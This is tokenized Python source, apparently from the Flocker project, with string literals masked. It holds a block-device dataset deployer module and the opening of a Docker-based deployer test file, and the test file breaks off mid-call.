size ) : <EOL> """<STR_LIT>""" <EOL> def destroy_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def attach_volume ( blockdevice_id , attach_to ) : <EOL> """<STR_LIT>""" <EOL> def detach_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def list_volumes ( ) : <EOL> """<STR_LIT>""" <EOL> def get_device_path ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> class ICloudAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def list_live_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> def start_node ( node_id ) : <EOL> """<STR_LIT>""" <EOL> @ auto_threaded ( ICloudAPI , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class _SyncToThreadedAsyncCloudAPIAdapter ( PClass ) : <EOL> """<STR_LIT>""" <EOL> _reactor = field ( ) <EOL> _sync = field ( ) <EOL> _threadpool = field ( ) <EOL> class MandatoryProfiles ( Values ) : <EOL> """<STR_LIT>""" <EOL> GOLD = ValueConstant ( u'<STR_LIT>' ) <EOL> SILVER = ValueConstant ( u'<STR_LIT>' ) <EOL> BRONZE = ValueConstant ( u'<STR_LIT>' ) <EOL> DEFAULT = ValueConstant ( BRONZE . value ) <EOL> class IProfiledBlockDeviceAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def create_volume_with_profile ( dataset_id , size , profile_name ) : <EOL> """<STR_LIT>""" <EOL> @ implementer ( IProfiledBlockDeviceAPI ) <EOL> class ProfiledBlockDeviceAPIAdapter ( PClass ) : <EOL> """<STR_LIT>""" <EOL> _blockdevice_api = field ( <EOL> mandatory = True , <EOL> invariant = provides ( IBlockDeviceAPI ) , <EOL> ) <EOL> def create_volume_with_profile ( self , dataset_id , size , profile_name ) : <EOL> """<STR_LIT>""" <EOL> CREATE_VOLUME_PROFILE_DROPPED ( dataset_id = dataset_id , <EOL> profile_name = profile_name ) . write ( ) <EOL> return self . _blockdevice_api . create_volume ( dataset_id = dataset_id , <EOL> size = size ) <EOL> @ implementer ( IBlockDeviceAsyncAPI ) <EOL> @ auto_threaded ( IBlockDeviceAPI , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class _SyncToThreadedAsyncAPIAdapter ( PClass ) : <EOL> """<STR_LIT>""" <EOL> _reactor = field ( ) <EOL> _sync = field ( ) <EOL> _threadpool = field ( ) <EOL> @ classmethod <EOL> def from_api ( cls , block_device_api , reactor = None ) : <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> return cls ( <EOL> _sync = block_device_api , <EOL> _reactor = reactor , <EOL> _threadpool = reactor . getThreadPool ( ) , <EOL> ) <EOL> def log_list_volumes ( function ) : <EOL> """<STR_LIT>""" <EOL> counter = itertools . count ( <NUM_LIT:1> ) <EOL> def _count_calls ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> CALL_LIST_VOLUMES ( <EOL> function = function . __name__ , count = next ( counter ) <EOL> ) . write ( ) <EOL> return function ( * args , ** kwargs ) <EOL> return _count_calls <EOL> @ log_list_volumes <EOL> def check_for_existing_dataset ( api , dataset_id ) : <EOL> """<STR_LIT>""" <EOL> volumes = api . list_volumes ( ) <EOL> for volume in volumes : <EOL> if volume . dataset_id == dataset_id : <EOL> raise DatasetExists ( volume ) <EOL> @ log_list_volumes <EOL> def get_blockdevice_volume ( api , blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> for volume in api . list_volumes ( ) : <EOL> if volume . blockdevice_id == blockdevice_id : <EOL> return volume <EOL> raise UnknownVolume ( blockdevice_id ) <EOL> def _manifestation_from_volume ( volume ) : <EOL> """<STR_LIT>""" <EOL> dataset = Dataset ( <EOL> dataset_id = volume . dataset_id , <EOL> maximum_size = volume . size , <EOL> ) <EOL> return Manifestation ( dataset = dataset , primary = True ) <EOL> class RawState ( PClass ) : <EOL> """<STR_LIT>""" <EOL> compute_instance_id = field ( unicode , mandatory = True ) <EOL> _live_instances = pset_field ( unicode , optional = True ) <EOL> volumes = pvector_field ( BlockDeviceVolume ) <EOL> devices = pmap_field ( UUID , FilePath ) <EOL> system_mounts = pmap_field ( FilePath , FilePath ) <EOL> devices_with_filesystems = pset_field ( FilePath ) <EOL> def is_known_dead_instance ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> if self . _live_instances is None : <EOL> return False <EOL> return instance_id not in self . _live_instances <EOL> @ implementer ( ILocalState ) <EOL> class BlockDeviceDeployerLocalState ( PClass ) : <EOL> """<STR_LIT>""" <EOL> hostname = field ( type = unicode , mandatory = True ) <EOL> node_uuid = field ( type = UUID , mandatory = True ) <EOL> datasets = pmap_field ( UUID , DiscoveredDataset ) <EOL> def shared_state_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> manifestations = { } <EOL> paths = { } <EOL> devices = { } <EOL> nonmanifest_datasets = { } <EOL> for dataset in self . datasets . values ( ) : <EOL> dataset_id = dataset . dataset_id <EOL> if dataset . state == DatasetStates . MOUNTED : <EOL> manifestations [ unicode ( dataset_id ) ] = Manifestation ( <EOL> dataset = Dataset ( <EOL> dataset_id = dataset_id , <EOL> maximum_size = dataset . maximum_size , <EOL> ) , <EOL> primary = True , <EOL> ) <EOL> paths [ unicode ( dataset_id ) ] = dataset . mount_point <EOL> elif dataset . state in ( <EOL> DatasetStates . NON_MANIFEST , DatasetStates . ATTACHED , <EOL> DatasetStates . ATTACHED_NO_FILESYSTEM , <EOL> DatasetStates . ATTACHED_TO_DEAD_NODE , <EOL> ) : <EOL> nonmanifest_datasets [ unicode ( dataset_id ) ] = Dataset ( <EOL> dataset_id = dataset_id , <EOL> maximum_size = dataset . maximum_size , <EOL> ) <EOL> if dataset . state in ( <EOL> DatasetStates . MOUNTED , DatasetStates . ATTACHED , <EOL> DatasetStates . ATTACHED_NO_FILESYSTEM , <EOL> ) : <EOL> devices [ dataset_id ] = dataset . device_path <EOL> return ( <EOL> NodeState ( <EOL> uuid = self . node_uuid , <EOL> hostname = self . hostname , <EOL> manifestations = manifestations , <EOL> paths = paths , <EOL> devices = devices , <EOL> applications = None , <EOL> ) , <EOL> NonManifestDatasets ( <EOL> datasets = nonmanifest_datasets <EOL> ) , <EOL> ) <EOL> def _provides_IDatasetStateChangeFactory ( k , v ) : <EOL> return provides ( IDatasetStateChangeFactory ) ( v ) <EOL> class TransitionTable ( CheckedPMap ) : <EOL> """<STR_LIT>""" <EOL> __key_type__ = NamedConstant <EOL> class __value_type__ ( CheckedPMap ) : <EOL> __key_type__ = NamedConstant <EOL> __invariant__ = _provides_IDatasetStateChangeFactory <EOL> NOTHING_TO_DO = NoOp ( sleep = timedelta ( seconds = <NUM_LIT> ) ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class DoNothing ( PClass ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def from_state_and_config ( discovered_dataset , desired_dataset ) : <EOL> return NOTHING_TO_DO <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class Poll ( PClass ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def from_state_and_config ( discovered_dataset , desired_dataset ) : <EOL> return NoOp ( sleep = timedelta ( seconds = <NUM_LIT:3> ) ) <EOL> Desired = Discovered = DatasetStates <EOL> DATASET_TRANSITIONS = TransitionTable . create ( { <EOL> Desired . MOUNTED : { <EOL> Discovered . NON_EXISTENT : CreateBlockDeviceDataset , <EOL> Discovered . ATTACHED_ELSEWHERE : Poll , <EOL> Discovered . REGISTERED : Poll , <EOL> Discovered . UNREGISTERED : RegisterVolume , <EOL> Discovered . ATTACHED_NO_FILESYSTEM : CreateFilesystem , <EOL> Discovered . NON_MANIFEST : AttachVolume , <EOL> Discovered . ATTACHED : MountBlockDevice , <EOL> Discovered . ATTACHED_TO_DEAD_NODE : DetachVolume , <EOL> } , <EOL> Desired . NON_MANIFEST : { <EOL> Discovered . NON_EXISTENT : CreateBlockDeviceDataset , <EOL> Discovered . ATTACHED_ELSEWHERE : DoNothing , <EOL> Discovered . REGISTERED : DoNothing , <EOL> Discovered . UNREGISTERED : RegisterVolume , <EOL> Discovered . ATTACHED_NO_FILESYSTEM : DetachVolume , <EOL> Discovered . ATTACHED : DetachVolume , <EOL> Discovered . MOUNTED : UnmountBlockDevice , <EOL> Discovered . ATTACHED_TO_DEAD_NODE : DoNothing , <EOL> } , <EOL> Desired . DELETED : { <EOL> Discovered . NON_EXISTENT : DoNothing , <EOL> Discovered . ATTACHED_ELSEWHERE : DoNothing , <EOL> Discovered . NON_MANIFEST : DestroyVolume , <EOL> Discovered . REGISTERED : DoNothing , <EOL> Discovered . UNREGISTERED : RegisterVolume , <EOL> Discovered . ATTACHED_NO_FILESYSTEM : DetachVolume , <EOL> Discovered . ATTACHED : DetachVolume , <EOL> Discovered . MOUNTED : UnmountBlockDevice , <EOL> Discovered . ATTACHED_TO_DEAD_NODE : DetachVolume , <EOL> } , <EOL> } ) <EOL> del Desired , Discovered <EOL> @ implementer ( ICalculator ) <EOL> class BlockDeviceCalculator ( PClass ) : <EOL> """<STR_LIT>""" <EOL> transitions = field ( TransitionTable , mandatory = True , <EOL> factory = TransitionTable . create , <EOL> initial = DATASET_TRANSITIONS ) <EOL> def _calculate_dataset_change ( self , discovered_dataset , desired_dataset ) : <EOL> """<STR_LIT>""" <EOL> desired_state = ( desired_dataset . state <EOL> if desired_dataset is not None <EOL> else DatasetStates . NON_MANIFEST ) <EOL> discovered_state = ( discovered_dataset . state <EOL> if discovered_dataset is not None <EOL> else DatasetStates . NON_EXISTENT ) <EOL> if desired_state != discovered_state : <EOL> transition = self . transitions [ desired_state ] [ discovered_state ] <EOL> return transition . from_state_and_config ( <EOL> discovered_dataset = discovered_dataset , <EOL> desired_dataset = desired_dataset , <EOL> ) <EOL> else : <EOL> return NOTHING_TO_DO <EOL> def calculate_changes_for_datasets ( <EOL> self , discovered_datasets , desired_datasets <EOL> ) : <EOL> actions = [ ] <EOL> for dataset_id in set ( discovered_datasets ) | set ( desired_datasets ) : <EOL> desired_dataset = desired_datasets . get ( dataset_id ) <EOL> discovered_dataset = discovered_datasets . get ( dataset_id ) <EOL> actions . append ( self . _calculate_dataset_change ( <EOL> discovered_dataset = discovered_dataset , <EOL> desired_dataset = desired_dataset , <EOL> ) ) <EOL> return in_parallel ( changes = actions ) <EOL> @ implementer ( IDeployer ) <EOL> class BlockDeviceDeployer ( PClass ) : <EOL> """<STR_LIT>""" <EOL> hostname = field ( type = unicode , mandatory = True ) <EOL> node_uuid = field ( type = UUID , mandatory = True ) <EOL> block_device_api = field ( mandatory = True ) <EOL> _underlying_blockdevice_api = field ( mandatory = True , initial = None ) <EOL> _async_block_device_api = field ( mandatory = True , initial = None ) <EOL> mountroot = field ( type = FilePath , initial = FilePath ( b"<STR_LIT>" ) ) <EOL> block_device_manager = field ( initial = BlockDeviceManager ( ) ) <EOL> calculator = field ( <EOL> invariant = provides ( ICalculator ) , <EOL> mandatory = True , <EOL> initial = BlockDeviceCalculator ( ) , <EOL> ) <EOL> @ property <EOL> def profiled_blockdevice_api ( self ) : <EOL> """<STR_LIT>""" <EOL> if IProfiledBlockDeviceAPI . providedBy ( <EOL> self . _underlying_blockdevice_api ) : <EOL> return self . _underlying_blockdevice_api <EOL> if IProfiledBlockDeviceAPI . providedBy ( self . block_device_api ) : <EOL> return self . block_device_api <EOL> return ProfiledBlockDeviceAPIAdapter ( <EOL> _blockdevice_api = self . block_device_api <EOL> ) <EOL> @ property <EOL> def async_block_device_api ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _async_block_device_api is None : <EOL> return _SyncToThreadedAsyncAPIAdapter . from_api ( <EOL> self . block_device_api , <EOL> ) <EOL> return self . _async_block_device_api <EOL> @ log_list_volumes <EOL> def _discover_raw_state ( self ) : <EOL> """<STR_LIT>""" <EOL> api = self . block_device_api <EOL> compute_instance_id = api . compute_instance_id ( ) <EOL> volumes = api . list_volumes ( ) <EOL> system_mounts = { <EOL> mount . blockdevice : mount . mountpoint <EOL> for mount in self . block_device_manager . get_mounts ( ) <EOL> } <EOL> def is_existing_block_device ( dataset_id , path ) : <EOL> if isinstance ( path , FilePath ) and path . isBlockDevice ( ) : <EOL> return True <EOL> INVALID_DEVICE_PATH ( <EOL> dataset_id = dataset_id , invalid_value = path <EOL> ) . write ( _logger ) <EOL> return False <EOL> devices = { } <EOL> for volume in volumes : <EOL> dataset_id = volume . dataset_id <EOL> if volume . attached_to == compute_instance_id : <EOL> device_path = api . get_device_path ( volume . blockdevice_id ) <EOL> if is_existing_block_device ( dataset_id , device_path ) : <EOL> devices [ dataset_id ] = device_path <EOL> else : <EOL> pass <EOL> if ICloudAPI . providedBy ( self . _underlying_blockdevice_api ) : <EOL> live_instances = self . _underlying_blockdevice_api . list_live_nodes ( ) <EOL> else : <EOL> live_instances = None <EOL> result = RawState ( <EOL> compute_instance_id = compute_instance_id , <EOL> _live_instances = live_instances , <EOL> volumes = volumes , <EOL> devices = devices , <EOL> system_mounts = system_mounts , <EOL> devices_with_filesystems = [ <EOL> device for device in devices . values ( ) <EOL> if self . block_device_manager . has_filesystem ( device ) ] , <EOL> ) <EOL> DISCOVERED_RAW_STATE ( raw_state = result ) . write ( ) <EOL> return result <EOL> def discover_state ( self , cluster_state , persistent_state ) : <EOL> """<STR_LIT>""" <EOL> raw_state = self . _discover_raw_state ( ) <EOL> datasets = { } <EOL> for volume in raw_state . volumes : <EOL> dataset_id = volume . dataset_id <EOL> owning_blockdevice_id = persistent_state . blockdevice_ownership . get ( <EOL> dataset_id ) <EOL> if owning_blockdevice_id is None : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . UNREGISTERED , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> ) <EOL> elif volume . blockdevice_id != owning_blockdevice_id : <EOL> if volume . attached_to is not None : <EOL> UNREGISTERED_VOLUME_ATTACHED ( <EOL> dataset_id = dataset_id , <EOL> block_device_id = volume . blockdevice_id , <EOL> ) . write ( ) <EOL> elif dataset_id in raw_state . devices : <EOL> device_path = raw_state . devices [ dataset_id ] <EOL> mount_point = self . _mountpath_for_dataset_id ( <EOL> unicode ( dataset_id ) <EOL> ) <EOL> if ( <EOL> device_path in raw_state . system_mounts and <EOL> raw_state . system_mounts [ device_path ] == mount_point <EOL> ) : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . MOUNTED , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> device_path = device_path , <EOL> mount_point = mount_point , <EOL> ) <EOL> else : <EOL> if device_path in raw_state . devices_with_filesystems : <EOL> state = DatasetStates . ATTACHED <EOL> else : <EOL> state = DatasetStates . ATTACHED_NO_FILESYSTEM <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = state , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> device_path = device_path , <EOL> ) <EOL> else : <EOL> if volume . attached_to in ( None , raw_state . compute_instance_id ) : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . NON_MANIFEST , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> ) <EOL> else : <EOL> if raw_state . is_known_dead_instance ( volume . attached_to ) : <EOL> state = DatasetStates . ATTACHED_TO_DEAD_NODE <EOL> else : <EOL> state = DatasetStates . ATTACHED_ELSEWHERE <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = state , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> ) <EOL> for dataset_id , blockdevice_id in ( <EOL> persistent_state . blockdevice_ownership . items ( ) <EOL> ) : <EOL> if dataset_id not in datasets : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . REGISTERED , <EOL> dataset_id = dataset_id , <EOL> blockdevice_id = blockdevice_id , <EOL> ) <EOL> local_state = BlockDeviceDeployerLocalState ( <EOL> node_uuid = self . node_uuid , <EOL> hostname = self . hostname , <EOL> datasets = datasets , <EOL> ) <EOL> return succeed ( local_state ) <EOL> def _mountpath_for_dataset_id ( self , dataset_id ) : <EOL> """<STR_LIT>""" <EOL> return self . mountroot . child ( dataset_id . encode ( "<STR_LIT:ascii>" ) ) <EOL> def _calculate_desired_for_manifestation ( self , manifestation ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = UUID ( manifestation . dataset . dataset_id ) <EOL> maximum_size = manifestation . dataset . maximum_size <EOL> if maximum_size is None : <EOL> maximum_size = int ( DEFAULT_DATASET_SIZE . bytes ) <EOL> common_args = { <EOL> '<STR_LIT>' : dataset_id , <EOL> '<STR_LIT>' : manifestation . dataset . metadata , <EOL> } <EOL> if manifestation . dataset . deleted : <EOL> return DesiredDataset ( <EOL> state = DatasetStates . DELETED , <EOL> ** common_args <EOL> ) <EOL> else : <EOL> return DesiredDataset ( <EOL> state = DatasetStates . MOUNTED , <EOL> maximum_size = maximum_size , <EOL> mount_point = self . _mountpath_for_dataset_id ( <EOL> unicode ( dataset_id ) <EOL> ) , <EOL> ** common_args <EOL> ) <EOL> def _calculate_desired_state ( <EOL> self , configuration , local_applications , local_datasets <EOL> ) : <EOL> not_in_use = NotInUseDatasets ( <EOL> node_uuid = self . node_uuid , <EOL> local_applications = local_applications , <EOL> leases = configuration . leases , <EOL> ) <EOL> this_node_config = configuration . get_node ( <EOL> self . node_uuid , hostname = self . hostname ) <EOL> desired_datasets = { <EOL> UUID ( manifestation . dataset . dataset_id ) : <EOL> self . _calculate_desired_for_manifestation ( <EOL> manifestation <EOL> ) <EOL> for manifestation in this_node_config . manifestations . values ( ) <EOL> } <EOL> not_in_use_datasets = set ( not_in_use ( local_datasets . values ( ) ) ) <EOL> for dataset_id , dataset in local_datasets . items ( ) : <EOL> if dataset in not_in_use_datasets : <EOL> continue <EOL> if dataset . state != DatasetStates . MOUNTED : <EOL> continue <EOL> desired_datasets [ dataset_id ] = DesiredDataset ( <EOL> dataset_id = dataset_id , <EOL> state = DatasetStates . MOUNTED , <EOL> maximum_size = dataset . maximum_size , <EOL> metadata = { } , <EOL> mount_point = self . _mountpath_for_dataset_id ( <EOL> unicode ( dataset_id ) <EOL> ) , <EOL> ) <EOL> return desired_datasets <EOL> def calculate_changes ( self , configuration , cluster_state , local_state ) : <EOL> local_node_state = cluster_state . get_node ( self . node_uuid , <EOL> hostname = self . hostname ) <EOL> desired_datasets = self . _calculate_desired_state ( <EOL> configuration = configuration , <EOL> local_applications = local_node_state . applications , <EOL> local_datasets = local_state . datasets , <EOL> ) <EOL> return self . calculator . calculate_changes_for_datasets ( <EOL> discovered_datasets = local_state . datasets , <EOL> desired_datasets = desired_datasets , <EOL> ) <EOL> class ProcessLifetimeCache ( proxyForInterface ( IBlockDeviceAPI , "<STR_LIT>" ) ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , api ) : <EOL> self . _api = api <EOL> self . _instance_id = None <EOL> self . _device_paths = { } <EOL> def compute_instance_id ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _instance_id is None : <EOL> self . _instance_id = self . _api . compute_instance_id ( ) <EOL> return self . _instance_id <EOL> def get_device_path ( self , blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> if blockdevice_id not in self . _device_paths : <EOL> self . _device_paths [ blockdevice_id ] = self . _api . get_device_path ( <EOL> blockdevice_id ) <EOL> return self . _device_paths [ blockdevice_id ] <EOL> def detach_volume ( self , blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> del self . _device_paths [ blockdevice_id ] <EOL> except KeyError : <EOL> pass <EOL> return self . _api . detach_volume ( blockdevice_id ) </s>
<s> """<STR_LIT>""" <EOL> from uuid import uuid4 <EOL> from pyrsistent import pmap , pvector , pset <EOL> from eliot import Message <EOL> from twisted . internet import reactor <EOL> from twisted . python . filepath import FilePath <EOL> from . . import ( <EOL> NodeLocalState , P2PManifestationDeployer , ApplicationNodeDeployer , <EOL> sequentially <EOL> ) <EOL> from ... common import loop_until <EOL> from ... control . _model import ( <EOL> Deployment , Application , DockerImage , Node , AttachedVolume , Link , <EOL> Manifestation , Dataset , DeploymentState , NodeState , <EOL> PersistentState , <EOL> ) <EOL> from . . _docker import DockerClient <EOL> from . . testtools import wait_for_unit_state , if_docker_configured <EOL> from ... testtools import ( <EOL> random_name , DockerImageBuilder , assertContainsAll , flaky , <EOL> AsyncTestCase , <EOL> ) <EOL> from ... volume . testtools import create_volume_service <EOL> from ... route import make_memory_network <EOL> from . . import run_state_change <EOL> from ... control . testtools import InMemoryStatePersister <EOL> class P2PNodeDeployer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , hostname , volume_service , docker_client = None , <EOL> network = None , node_uuid = None ) : <EOL> self . manifestations_deployer = P2PManifestationDeployer ( <EOL> hostname , volume_service , node_uuid = node_uuid ) <EOL> self . applications_deployer = ApplicationNodeDeployer ( <EOL> hostname , docker_client , network , node_uuid = node_uuid ) <EOL> self . hostname = hostname <EOL> self . node_uuid = node_uuid <EOL> self . volume_service = self . manifestations_deployer . volume_service <EOL> self . docker_client = self . applications_deployer . docker_client <EOL> self . network = self . applications_deployer . network <EOL> def discover_state ( self , cluster_state , persistent_state ) : <EOL> d = self . manifestations_deployer . discover_state ( <EOL> cluster_state , persistent_state = persistent_state ) <EOL> def got_manifestations_state ( manifestations_local_state ) : <EOL> manifestations_state = manifestations_local_state . node_state <EOL> app_discovery = self . applications_deployer . discover_state ( <EOL> DeploymentState ( nodes = { manifestations_state } ) , <EOL> persistent_state = PersistentState ( ) , <EOL> ) <EOL> def got_app_local_state ( app_local_state ) : <EOL> app_state = app_local_state . node_state <EOL> new_app_local_state = NodeLocalState ( <EOL> node_state = ( <EOL> app_state . evolver ( ) <EOL> . set ( "<STR_LIT>" , <EOL> manifestations_state . manifestations ) <EOL> . set ( "<STR_LIT>" , manifestations_state . paths ) <EOL> . set ( "<STR_LIT>" , <EOL> manifestations_state . devices ) . persistent ( ) ) ) <EOL> return new_app_local_state <EOL> app_discovery . addCallback ( got_app_local_state ) <EOL> return app_discovery <EOL> d . addCallback ( got_manifestations_state ) <EOL> return d <EOL> def calculate_changes ( self , configuration , cluster_state , local_state ) : <EOL> """<STR_LIT>""" <EOL> return sequentially ( changes = [ <EOL> self . applications_deployer . calculate_changes ( <EOL> configuration , cluster_state , local_state ) , <EOL> self . manifestations_deployer . calculate_changes ( <EOL> configuration , cluster_state , local_state ) , <EOL> ] ) <EOL> def change_node_state ( deployer , desired_configuration ) : <EOL> """<STR_LIT>""" <EOL> state_persister = InMemoryStatePersister ( ) <EOL> def converge ( ) : <EOL> d = deployer . discover_state ( <EOL> DeploymentState ( nodes = { <EOL> NodeState ( hostname = deployer . hostname , uuid = deployer . node_uuid , <EOL> applications = [ ] , <EOL> manifestations = { } , paths = { } , devices = { } ) , <EOL> } ) , <EOL> persistent_state = state_persister . get_state ( ) , <EOL> ) <EOL> def got_changes ( local_state ) : <EOL> changes = local_state . shared_state_changes ( ) <EOL> cluster_state = DeploymentState ( ) <EOL> for change in changes : <EOL> cluster_state = change . update_cluster_state ( cluster_state ) <EOL> return deployer . calculate_changes ( <EOL> desired_configuration , cluster_state , local_state ) <EOL> d . addCallback ( got_changes ) <EOL> d . addCallback ( lambda change : run_state_change ( <EOL> change , deployer = deployer , <EOL> state_persister = state_persister ) ) <EOL> return d <EOL> result = converge ( ) <EOL> result . addCallback ( lambda _ : converge ( ) ) <EOL> result . addCallback ( lambda _ : converge ( ) ) <EOL> return result <EOL> def find_unit ( units , unit_name ) : <EOL> Message . new ( <EOL> message_type = "<STR_LIT>" , <EOL> units = list ( unit . name for unit in units ) , desired_unit = unit_name <EOL> ) . write ( ) <EOL> for unit in units : <EOL> if unit . name == unit_name : <EOL> return unit <EOL> class DeployerTests ( AsyncTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ if_docker_configured <EOL> def test_environment ( self ) : <EOL> """<STR_LIT>""" <EOL> expected_variables = frozenset ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } . items ( ) ) <EOL> docker_dir = FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) <EOL> volume_service = create_volume_service ( self ) <EOL> image = DockerImageBuilder ( test = self , source_dir = docker_dir ) <EOL> d = image . build ( ) <EOL> def image_built ( image_name ) : <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = P2PNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , volume_service , docker_client , <EOL> make_memory_network ( ) , node_uuid = uuid4 ( ) ) <EOL> dataset = Dataset ( <EOL> dataset_id = unicode ( uuid4 ( ) ) , <EOL> metadata = pmap ( { "<STR_LIT:name>" : application_name } ) ) <EOL> manifestation = Manifestation ( dataset = dataset , primary = True ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = DockerImage . from_string ( <EOL> image_name ) , <EOL> environment = expected_variables , <EOL> volume = AttachedVolume ( <EOL> manifestation = manifestation , <EOL> mountpoint = FilePath ( '<STR_LIT>' ) , <EOL> ) , <EOL> links = frozenset ( ) , <EOL> ) ] ) , <EOL> manifestations = { <EOL> manifestation . dataset_id : manifestation } ) ] ) ) <EOL> return change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( image_built ) <EOL> d . addCallback ( lambda _ : volume_service . enumerate ( ) ) <EOL> d . addCallback ( <EOL> lambda volumes : <EOL> list ( volumes ) [ <NUM_LIT:0> ] . get_filesystem ( ) . get_path ( ) . child ( b'<STR_LIT>' ) ) <EOL> def got_result_path ( result_path ) : <EOL> d = loop_until ( reactor , result_path . exists ) <EOL> d . addCallback ( lambda _ : result_path ) <EOL> return d <EOL> d . addCallback ( got_result_path ) <EOL> def started ( result_path ) : <EOL> contents = result_path . getContent ( ) <EOL> assertContainsAll ( <EOL> haystack = contents , <EOL> test_case = self , <EOL> needles = [ '<STR_LIT>' . format ( k , v ) <EOL> for k , v in expected_variables ] ) <EOL> d . addCallback ( started ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_links ( self ) : <EOL> """<STR_LIT>""" <EOL> expected_variables = frozenset ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } . items ( ) ) <EOL> volume_service = create_volume_service ( self ) <EOL> docker_dir = FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) <EOL> image = DockerImageBuilder ( test = self , source_dir = docker_dir ) <EOL> d = image . build ( ) <EOL> def image_built ( image_name ) : <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = P2PNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , volume_service , docker_client , <EOL> make_memory_network ( ) , node_uuid = uuid4 ( ) ) <EOL> link = Link ( alias = u"<STR_LIT>" , <EOL> local_port = <NUM_LIT> , <EOL> remote_port = <NUM_LIT> ) <EOL> dataset = Dataset ( <EOL> dataset_id = unicode ( uuid4 ( ) ) , <EOL> metadata = pmap ( { "<STR_LIT:name>" : application_name } ) ) <EOL> manifestation = Manifestation ( dataset = dataset , primary = True ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = DockerImage . from_string ( <EOL> image_name ) , <EOL> links = frozenset ( [ link ] ) , <EOL> volume = AttachedVolume ( <EOL> manifestation = manifestation , <EOL> mountpoint = FilePath ( '<STR_LIT>' ) , <EOL> ) , <EOL> ) ] ) , <EOL> manifestations = { <EOL> manifestation . dataset_id : manifestation } ) ] ) ) <EOL> return change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( image_built ) <EOL> d . addCallback ( lambda _ : volume_service . enumerate ( ) ) <EOL> d . addCallback ( lambda volumes : <EOL> list ( volumes ) [ <NUM_LIT:0> ] . get_filesystem ( ) . get_path ( ) . child ( <EOL> b'<STR_LIT>' ) ) <EOL> def got_result_path ( result_path ) : <EOL> d = loop_until ( reactor , result_path . exists ) <EOL> d . addCallback ( lambda _ : result_path ) <EOL> return d <EOL> d . addCallback ( got_result_path ) <EOL> def started ( result_path ) : <EOL> contents = result_path . getContent ( ) <EOL> assertContainsAll ( <EOL> haystack = contents , <EOL> test_case = self , <EOL> needles = [ '<STR_LIT>' . format ( k , v ) <EOL> for k , v in expected_variables ] ) <EOL> d . addCallback ( started ) <EOL> return d <EOL> def _start_container_for_introspection ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = ApplicationNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , docker_client , <EOL> make_memory_network ( ) , node_uuid = uuid4 ( ) ) <EOL> application = Application ( <EOL> name = application_name , <EOL> image = DockerImage . from_string ( u"<STR_LIT>" ) , <EOL> ** kwargs ) <EOL> desired_configuration = Deployment ( nodes = [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = [ application ] ) ] ) <EOL> d = change_node_state ( deployer , desired_configuration 